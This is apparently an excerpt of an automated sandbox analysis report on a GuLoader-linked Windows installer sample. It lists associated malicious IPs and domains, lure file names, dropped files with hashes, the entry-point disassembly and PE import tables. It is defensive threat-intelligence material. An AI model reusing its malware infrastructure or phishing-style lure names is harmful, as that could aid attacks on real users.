                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: 3507071243740008011.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  11:50:47API Interceptor3x Sleep call for process: 3507071243740008011.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.107.36.30Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                    Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                      SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                        SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          alfacen.comPotwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SUPERHOSTING_ASBGPotwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                          • 193.107.36.30
                          Atlanta Office Interiors #024-010.pdfGet hashmaliciousUnknownBrowse
                          • 185.45.66.155
                          https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbAGet hashmaliciousUnknownBrowse
                          • 185.45.66.155
                          Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).htmlGet hashmaliciousUnknownBrowse
                          • 193.107.36.200
                          is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
                          • 185.45.67.220
                          gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                          • 195.191.149.33
                          INV90097.exeGet hashmaliciousFormBookBrowse
                          • 164.138.218.177

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                          • 193.107.36.30
                          Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                          • 193.107.36.30
                          JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                          • 193.107.36.30
                          SecuriteInfo.com.FileRepMalware.4445.21502.exeGet hashmaliciousUnknownBrowse
                          • 193.107.36.30
                          yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                          • 193.107.36.30
                          EL7ggW7AdA.exeGet hashmaliciousStealc, VidarBrowse
                          • 193.107.36.30
                          y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                          • 193.107.36.30
                          xy894fdlWJ.exeGet hashmaliciousVidarBrowse
                          • 193.107.36.30
                          SecuriteInfo.com.Win32.Evo-gen.14702.4787.exeGet hashmaliciousKoiLoaderBrowse
                          • 193.107.36.30
                          4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                          • 193.107.36.30

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dllPotwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                            Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                              RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousGuLoaderBrowse
                                    Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousGuLoaderBrowse
                                        Benefit_Signature_Plan#3762.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          Benefit_Signature_Plan#3762.com.exeGet hashmaliciousGuLoaderBrowse
                                            DHL SHIPPING DOCUMENTS.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11776
                                              Entropy (8bit):5.659026618805001
                                              Encrypted:false
                                              SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                              MD5:9625D5B1754BC4FF29281D415D27A0FD
                                              SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                              SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                              SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                              • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                              • Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious, Browse
                                              • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                              • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                              • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                              • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                              • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
                                              • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious, Browse
                                              • Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...Y..Y...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\Itchreed.Cur

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):275040
                                              Entropy (8bit):7.825277312996347
                                              Encrypted:false
                                              SSDEEP:6144:P5XT4JjPPEAaRnOn2Ve4a0GClPcj4/egfL:EzEAaRnd1aAPrz
                                              MD5:E8245DB6B6E54F7C0D63D57E8EFAF894
                                              SHA1:1F00810AEF27A4018360E9104B1E58F75E713E28
                                              SHA-256:70758486A5D02D9F560081520A6484D24AC0100BA38A66980CA6D618CE3DF224
                                              SHA-512:B79DB2F35357148C58481E0F2EC11802E0EA52BB37B73DE4E062763457671600D17DF228EE5FA0F41EBF52130954DD02D9BDA873DD20BD3777A2B2B3E2344A0F
                                              Malicious:false
                                              Reputation:low
                                              Preview:...cc..............`....LLL.....J....................Q...............444........!..d...}...::......i......888.....................ii...................P.................B....U.......................%%..............4..........>>>.......q.................................mmm...,,,,,.....................................WWWWW...................ppppp..../..............777...........444444.......IIII.I........$.```.tt....^^^.................88......````......................................................S.....K.....i........xxx............-.............C...........LL.................................&&..............................................................@@.........................".5..V...66.k.....IIIII.s.............^^..........................uu.....x.<<<<.............X.........."".F...........rrrrr...h.............&........................=.II..........................OOO........gg..............BBBBB..........C...}....\\\\..........................I...^^^........#.........I.oo...

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\Strobilation.Tru

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):46153
                                              Entropy (8bit):4.551881715223996
                                              Encrypted:false
                                              SSDEEP:768:KzRgvbCj7eXDwAX+Fg2mUrZunWT1xdtoQkaor4p2JEoAAJBIVjDdJ:Kq22EA4VZ8C1xdt7k34pGCAXILJ
                                              MD5:87AC38D040E1207012CF6AD9A83C6530
                                              SHA1:59E5A1243DCB479A5F3361E38F62D3DE6BBF4C55
                                              SHA-256:A5FE6A3AC0371EE8D3D089C3A69A68B25EBBB5F7362C469DF3EACBD2F627CB60
                                              SHA-512:98794621B3DDA069E1F9567922CCB9CDA7D3BBCBA3254AE179FCE24E7B4615E8AF4BE0A2D25858F1F0B495296D05BB6702819DADA90A963B3F89C5AC50FA0271
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........r.........`..............^^^^...ZZ............SS.............;.Z.......r..;........'''........SSSS........w....................O...........CC......jjjjjj....^....,,,.....................????.~............................................zz..pp........y........`.XXX............X............zz.C.........!!!........LL.d....!!....d....XXX...u.....333......<<<<.oo..AA..FF............=............0.................?............&&.i.8...........F.....8.....o....z..0.3333......s.....>.......%.....................]..6.0000....L..N..............B..........88.......'..................^^^.h.H.?......A.....................................pp..........!............%.../.n.......N............y..z.5.!!..N..........n.............{..........W................V.......::.........CC................00.........................................kkkk.M.OOO.DDD.U..........!!!.................,....................Y.......$.....___..s.............SSSS.HHH.....................................................

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\img-1.jpg

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
                                              Category:dropped
                                              Size (bytes):167813
                                              Entropy (8bit):7.749904770387752
                                              Encrypted:false
                                              SSDEEP:3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
                                              MD5:8C0739994C90303B65A05C6909A53B62
                                              SHA1:E43239AF385F8DED6EA2098D2A71A2AC9519E32B
                                              SHA-256:7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
                                              SHA-512:65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\nannie.tek

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):329924
                                              Entropy (8bit):4.933260234424776
                                              Encrypted:false
                                              SSDEEP:6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
                                              MD5:562A26D4A57C23D2AE8BD4DECE37E771
                                              SHA1:A9830E759E670EB8D4EFC5320A112E44ECB389BA
                                              SHA-256:EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
                                              SHA-512:50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
                                              Malicious:false
                                              Reputation:low
                                              Preview:......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\nonpendency.age

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):48084
                                              Entropy (8bit):4.914629993393861
                                              Encrypted:false
                                              SSDEEP:768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
                                              MD5:511E6E568EBCF13D5098054630C627AA
                                              SHA1:1B5AFC7023C138219737E23B00121C359BF8443F
                                              SHA-256:204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
                                              SHA-512:DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
                                              Malicious:false
                                              Reputation:low
                                              Preview:.................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\rimsmeds.txt

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):501
                                              Entropy (8bit):4.284126845947256
                                              Encrypted:false
                                              SSDEEP:12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
                                              MD5:5D2F45598C5DAD8A461CECDA82CA550E
                                              SHA1:D594FFDAE11463E5E35170D27C611182F16E038C
                                              SHA-256:65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
                                              SHA-512:BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
                                              Malicious:false
                                              Preview:wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,

                                              C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular\skreddene.spo

                                              Download File
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):54488
                                              Entropy (8bit):4.944297757860882
                                              Encrypted:false
                                              SSDEEP:1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
                                              MD5:4ECFFF116FE03C56DAD5B0EAE0279D00
                                              SHA1:18525703697F059B03F7A1F093317E62BAD43004
                                              SHA-256:593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
                                              SHA-512:D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
                                              Malicious:false
                                              Preview:.... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.74598799640421
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:3507071243740008011.exe
                                              File size:986'863 bytes
                                              MD5:300ffb3fd65eb4a84a14802828f91e38
                                              SHA1:937574595a8e68f7a77b95a7f99b530007f9fc5c
                                              SHA256:24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
                                              SHA512:c79642cc8d878f5028dff42341dc137c59127cc7a395a39891457648460d8c421ea37c5ac7569d58f5be92a1a7f10d5aed83cadbfcb8e4ee14428c852aac8348
                                              SSDEEP:24576:8HANkRMLHpYc/hipJgn1pRQFPEgAhHjL4kJiMv:8HANkRMLHicJi3o10RHc0aJ
                                              TLSH:4D252208E7E07467C3E58FF8072652577637AC69E5920B870391BFAA3A65740F60E378
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........

                                              File Icon

                                              Icon Hash:c4bcaaec6ceeda31

                                              Static PE Info

                                              General

                                              Entrypoint:0x403373
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:b34f154ec913d2d2c435cbd644e91687

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+14h], ebx
                                              mov dword ptr [esp+10h], 0040A2E0h
                                              mov dword ptr [esp+1Ch], ebx
                                              call dword ptr [004080A8h]
                                              call dword ptr [004080A4h]
                                              and eax, BFFFFFFFh
                                              cmp ax, 00000006h
                                              mov dword ptr [00434EECh], eax
                                              je 00007FF06C8C70F3h
                                              push ebx
                                              call 00007FF06C8CA389h
                                              cmp eax, ebx
                                              je 00007FF06C8C70E9h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082B0h
                                              push esi
                                              call 00007FF06C8CA303h
                                              push esi
                                              call dword ptr [00408150h]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], 00000000h
                                              jne 00007FF06C8C70CCh
                                              push 0000000Ah
                                              call 00007FF06C8CA35Ch
                                              push 00000008h
                                              call 00007FF06C8CA355h
                                              push 00000006h
                                              mov dword ptr [00434EE4h], eax
                                              call 00007FF06C8CA349h
                                              cmp eax, ebx
                                              je 00007FF06C8C70F1h
                                              push 0000001Eh
                                              call eax
                                              test eax, eax
                                              je 00007FF06C8C70E9h
                                              or byte ptr [00434EEFh], 00000040h
                                              push ebp
                                              call dword ptr [00408044h]
                                              push ebx
                                              call dword ptr [004082A0h]
                                              mov dword ptr [00434FB8h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebx
                                              push 0042B208h
                                              call dword ptr [00408188h]
                                              push 0040A2C8h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000x34908.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x65ef0x6600a7ac317f30d043d93d4c5978f973de39False0.6750919117647058data6.514810500836391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x2aff80x600d113e76cc1b8c0774c4702688d79d792False0.5162760416666666data4.036693470004838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x350000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x6a0000x349080x34a00d09097303c9883a16609d6cfc168ddcdFalse0.5725671763657957data6.134346545573802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_BITMAP0x6a4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                              RT_ICON0x6a7680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.39200579675854724
                                              RT_ICON0x7af900xc890PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9980328762854472
                                              RT_ICON0x878200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.46636535631700654
                                              RT_ICON0x90cc80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.49302218114602586
                                              RT_ICON0x961500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4863013698630137
                                              RT_ICON0x9a3780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.46473029045643155
                                              RT_ICON0x9c9200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.550187617260788
                                              RT_ICON0x9d9c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4095744680851064
                                              RT_DIALOG0x9de300x144dataEnglishUnited States0.5216049382716049
                                              RT_DIALOG0x9df780x13cdataEnglishUnited States0.5506329113924051
                                              RT_DIALOG0x9e0b80x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x9e1b80x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0x9e2d80xc4dataEnglishUnited States0.5918367346938775
                                              RT_DIALOG0x9e3a00x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x9e4000x76dataEnglishUnited States0.7542372881355932
                                              RT_VERSION0x9e4780x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.5813253012048193
                                              RT_MANIFEST0x9e5c80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                              Imports

                                              DLLImport
                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
